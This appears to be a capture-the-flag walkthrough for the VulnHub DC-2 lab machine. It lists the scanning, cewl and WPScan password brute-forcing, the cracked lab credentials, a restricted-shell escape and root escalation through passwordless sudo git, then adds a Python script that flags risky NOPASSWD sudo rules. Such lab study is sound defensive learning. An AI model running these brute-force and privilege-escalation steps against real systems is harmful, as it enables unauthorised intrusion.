For details of DC-2, please visit: https://www.vulnhub.com/entry/dc-2,311/
Target machine environment: VirtualBox, connected to the VirtualBox Host-Only network adapter, IP: 192.168.56.103
Attack machine environment: VMware, bridged mode, bridged to the VirtualBox Host-Only network adapter, IP: 192.168.56.177
Scan for live hosts on the class C segment
arp-scan -l
or
nmap -sP 192.168.56.1/24
Visiting http://192.168.56.103 redirects to http://dc-2, so add an entry for dc-2 to /etc/hosts
Scan the target machine with Nmap to collect information
nmap -Pn -sSV -A -p- -T5 192.168.56.103
flag1 is found on the site, and it hints at using cewl
PS: Cewl is an application written in Ruby that crawls a URL and returns a wordlist file for use by brute-force tools
Use cewl to crawl the site and generate a wordlist
cewl -w dc2_password.txt http://dc-2/
Enumerate site users with WPScan
wpscan --url http://dc-2/ -e u
Use the cewl-generated wordlist to brute-force the passwords
wpscan --url http://dc-2/ -P /home/mochu7/Desktop/dc2_password.txt --max-threads 100
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Log in as jerry to get flag2
The tom account can log in over SSH
PS: The SSH port here is not 22; the earlier port scan shows that the SSH port is 7744
The tom user's shell is restricted and many commands cannot be used
flag3.txt can be read here with the less command, with no need to escalate privileges
Escalation (breaking out of the restricted shell):
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin
flag3
flag4
The jerry user could not log in over SSH when tested earlier, but you can switch to that user directly here
According to the hint in flag4, git should be the way to get root here. First check which commands sudo can execute without a password
The next step is to escalate privileges with git
Reference article: https://gtfobins.github.io/gtfobins/git/
sudo git -p help config
!/bin/sh
final-flag
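
The passwordless sudo rule for git found above is the kind of entry a defender should audit for. The following is an added example, not part of the original walkthrough: it parses `sudo -l` output and flags NOPASSWD rules for binaries that can spawn a shell. The sample output and the binary list are constructed assumptions for illustration.

```python
import re

# Binaries with a pager or built-in shell escape (illustrative subset
# assumed for this example; GTFOBins documents many more).
SHELL_ESCAPE_BINARIES = {"git", "less", "more", "man", "vi", "vim", "find", "awk"}

# Constructed sample of `sudo -l` output, not captured from the DC-2 machine.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/uptime
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")

def audit_sudo_l(text):
    """Return (runas, command, reason) for each risky NOPASSWD rule."""
    findings = []
    for line in text.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue
        nopasswd = False  # tags carry over to later commands on the same line
        for cmd in (c.strip() for c in rule.group("spec").split(",")):
            tag = TAG.match(cmd)
            while tag:
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                cmd = cmd[tag.end():]
                tag = TAG.match(cmd)
            if not nopasswd or not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((rule.group("runas"), cmd, "any command"))
            elif binary in SHELL_ESCAPE_BINARIES:
                findings.append((rule.group("runas"), cmd, "shell escape possible"))
    return findings

if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[!] NOPASSWD as ({runas}): {cmd} -> {reason}")
```

Each finding is a rule to remove, or to require a password for, because the listed binary lets the invoking user reach a shell as the run-as user.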